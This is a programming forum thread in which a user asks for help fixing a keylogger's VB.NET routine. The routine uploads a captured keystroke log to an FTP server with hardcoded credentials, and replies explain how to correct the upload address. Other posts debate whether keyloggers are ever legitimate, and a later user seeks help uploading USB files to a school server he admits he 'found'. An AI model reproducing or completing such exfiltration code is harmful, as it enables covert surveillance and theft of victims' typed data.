|
-
Oct 8th, 2008, 06:42 PM
#1
Thread Starter
Junior Member
Keylogger Problem
(I did not write this code. . . Doing it for a friend )
I made this keylogger, and this one line of code acts up whenever I start and test the program!
Code:
Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click
If System.IO.File.Exists("C:\WINDOWS\RedSkeleton.txt") Then
My.Computer.Network.UploadFile("C:\WINDOWS\RedSkeleton.txt", "FTP://192.168.0.6:6089", "RedSkeleton", "keylogger")
End If
End Sub
The whole thing gets hi-lited yellow! Pleas help!
-
Oct 8th, 2008, 07:07 PM
#2
New Member
Re: Keylogger Problem
thx blade for posting for me cuase i was to lazzy to =X
but the error code is:
System.InvalidOperationException was unhandled
Message="The address for UploadFile needs to include a file name."
Source="Microsoft.VisualBasic"
StackTrace:
at Microsoft.VisualBasic.Devices.Network.UploadFile(String sourceFileName, String address, String userName, String password, Boolean showUI, Int32 connectionTimeout, UICancelOption onUserCancel)
at Microsoft.VisualBasic.Dev
and it goes with the line of code above..
-
Oct 8th, 2008, 09:34 PM
#3
Fanatic Member
-
Oct 8th, 2008, 09:40 PM
#4
Re: Keylogger Problem
I would think that the error message would speak for itself.
The address for UploadFile needs to include a file name.
Yours obviously doesn't.
Code:
"FTP://192.168.0.6:6089"
-
Dec 20th, 2009, 03:42 PM
#5
Addicted Member
Re: Keylogger Problem
I have the same problem...
What should I add?
-
Dec 20th, 2009, 05:33 PM
#6
Re: Keylogger Problem
Obviously, the filename!
Instead of ftp://whatever/, put ftp://whatever/myfilename.txt.
Is this an evil key logger or a good one?
-
Dec 20th, 2009, 06:12 PM
#7
Re: Keylogger Problem
 Originally Posted by minitech
There is no such thing as a good key logger. The very definition of a key logger is built on malicious purposes. Even if the OP has fooled himself into believing that his actions are just, they never are
CodeBank contributions: Process Manager, Temp File Cleaner
 Originally Posted by SJWhiteley
"game trainer" is the same as calling the act of robbing a bank "wealth redistribution"....
-
Dec 20th, 2009, 06:14 PM
#8
Re: Keylogger Problem
Parental control, for auto-logout when filtered text is typed.
-
Dec 20th, 2009, 06:15 PM
#9
Hyperactive Member
Re: Keylogger Problem
 Originally Posted by weirddemon
There is no such thing as a good key logger. The very definition of a key logger is built on malicious purposes. Even if the OP has fooled himself into believing that his actions are just, they never are 
My employees know they are being monitored and keylogged when they use company computers.
Also i know plenty of parents who monitor what their children do on the computer through a keylogger.
How are these bad keyloggers? You may have just offended many people my friend.
-
Dec 20th, 2009, 06:29 PM
#10
Re: Keylogger Problem
 Originally Posted by Philly0494
My employees know they are being monitored and keylogged when they use company computers.
Also i know plenty of parents who monitor what their children do on the computer through a keylogger.
How are these bad keyloggers? You may have just offended many people my friend.
Like I mentioned, regardless of the justification people give themselves, Key Loggers are bad.
CodeBank contributions: Process Manager, Temp File Cleaner
 Originally Posted by SJWhiteley
"game trainer" is the same as calling the act of robbing a bank "wealth redistribution"....
-
Dec 20th, 2009, 06:31 PM
#11
Re: Keylogger Problem
 Originally Posted by Philly0494
My employees know they are being monitored and keylogged when they use company computers.
Also i know plenty of parents who monitor what their children do on the computer through a keylogger.
How are these bad keyloggers? You may have just offended many people my friend.
It doesn't matter if there are useful purposes for keyloggers, it is against the forum's AUP to help someone write one, so odds are this thread will be locked as soon as a moderator sees it.
-
Dec 20th, 2009, 06:32 PM
#12
-
Dec 20th, 2009, 06:34 PM
#13
Addicted Member
Re: Keylogger Problem
This is not for keylogger. I want to copy some files from usb and if internet connection is available upload through ftp, if isn't save to location in computer. (for school purposes )
Now i have another problem :S .
I got this error:
Code:
The remote server returned an error: (550) File unavailable (e.g., file not found, no access).
I set connection timeout on 5000, but i still get this error.
Last edited by Blagojce; Dec 20th, 2009 at 07:01 PM.
-
Dec 20th, 2009, 08:13 PM
#14
Re: Keylogger Problem
if that's the case, you shouldn't have hijacked a thread about kepy loggers that is OVER ONE YEAR OLD....
-tg
-
Dec 20th, 2009, 08:36 PM
#15
Re: Keylogger Problem
That's awesome. I hadn't even realized he hijacked the thread. I guess that's what I get for now looking at everything
CodeBank contributions: Process Manager, Temp File Cleaner
 Originally Posted by SJWhiteley
"game trainer" is the same as calling the act of robbing a bank "wealth redistribution"....
-
Dec 20th, 2009, 09:29 PM
#16
Frenzied Member
Re: Keylogger Problem
I agree with on post #4 jmcilhinney.
Why would you even want to make a keylogger for?
-
Dec 21st, 2009, 06:56 AM
#17
Re: Keylogger Problem
 Originally Posted by Philly0494
How are these bad keyloggers? You may have just offended many people my friend.
I would hope this is not true. Anyone so thin skinned is going to have a bit of rough time in this life.
@Blagojce:
1. If this isn't a keylogger, then as techgnome asks, why did you post in a year old thread about keylogging?
2. Does your account have the necessary access rights to the remote server that would allow you to perform the task? If not, and this is for a legitimate school function then you really don't need help from us. Take it up with the IT people at your school.
-
Dec 21st, 2009, 07:14 AM
#18
Addicted Member
Re: Keylogger Problem
@Hack
1. I posted here because i have the same problem.
2. Yes, i have full access rights to remote server because i found the host. IT people in our school don't understand programming.
-
Dec 23rd, 2009, 07:16 AM
#19
Addicted Member
Re: Keylogger Problem
BUMP.
Now I got this message:
Code:
The remote server returned an error: (500) Syntax error, command unrecognized.
at the GetRequestStream() function.
-
Dec 23rd, 2009, 10:21 AM
#20
Re: Keylogger Problem
2. Yes, i have full access rights to remote server because i found the host. IT people in our school don't understand programming.
I have full access rights to my neighbours house because I found his spare key. He doesn't understand security.
-
Dec 23rd, 2009, 01:09 PM
#21
Re: Keylogger Problem
I think "IT People in our school don't understand programming" is in response to "Take it up with the IT people at your school".
-
Dec 23rd, 2009, 01:24 PM
#22
Re: Keylogger Problem
 Originally Posted by Blagojce
This is not for keylogger. I want to copy some files from usb and if internet connection is available upload through ftp, if isn't save to location in computer.  (for school purposes  )
Now i have another problem :S .
I got this error:
Code:
The remote server returned an error: (550) File unavailable (e.g., file not found, no access).
I set connection timeout on 5000, but i still get this error.
And what piece of code caused this error?
-
Dec 23rd, 2009, 01:27 PM
#23
Re: Keylogger Problem
Seriously, I think this REALLY needs to be moved to its own thread... rather than continuing to hijack the thread. Especially since you claim the problem has nothing to do with the original posting.
-tg
-
Dec 23rd, 2009, 01:36 PM
#24
Addicted Member
Re: Keylogger Problem
What i should to enclose like proof rights over host?
@dbasnett
I solved that problem.
Now I got error on post #19.
-
Dec 23rd, 2009, 01:40 PM
#25
Re: Keylogger Problem
 Originally Posted by Blagojce
BUMP.
Now I got this message:
Code:
The remote server returned an error: (500) Syntax error, command unrecognized.
at the GetRequestStream() function.
Post the code that causes this error, and I agree that you should start a new thread.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|